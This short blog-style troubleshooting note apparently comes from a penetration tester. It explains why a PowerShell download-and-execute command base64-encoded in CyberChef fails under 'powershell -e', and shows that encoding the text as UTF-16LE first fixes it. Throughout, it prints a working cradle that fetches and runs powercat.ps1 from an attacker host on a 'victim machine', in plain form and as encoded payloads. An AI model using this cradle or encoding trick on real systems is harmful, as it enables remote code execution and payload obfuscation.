init

In one case I ran into a strange issue that I had never faced before. I was trying to execute a PowerShell command as shown below:

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')

Interestingly, however, things go wrong if I use CyberChef to base64-encode the above command so that I can pass it to powershell -e, which decodes the command and then executes it on the victim machine.

If the encoding is done in CyberChef, we get the following:

SUVYKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC41Ni4yNTQ6ODAwMC9wb3dlcmNhdC5wczEnKQ==

However, if we try to execute the command on a trial machine, we see the following: [screenshot: the encoded command fails to execute] Clearly the command cannot be executed.

encode using powershell

After some debugging I found that there is a significant difference between the base64 encoding produced by PowerShell and by CyberChef. If we execute the following in PowerShell:

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')"))

the output we get in PowerShell is:

SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADIANQA0ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA=

As we can see, the two base64-encoded strings differ significantly. If we try to decode the PowerShell-generated base64 string in CyberChef, we get some strange-looking characters (a NUL byte after every character, because the input is UTF-16LE).

[screenshot: CyberChef decoding the PowerShell-generated base64 string]

solve

The difference comes from the text encoding each tool applies before base64: CyberChef uses UTF-8, while PowerShell's -e switch expects what .NET calls Unicode, i.e. UTF-16LE. In CyberChef, first apply the "Encode text" operation with UTF-16LE (1200) and then "To Base64" to encode the command properly. [screenshot: CyberChef recipe with Encode text (UTF-16LE, 1200) followed by To Base64]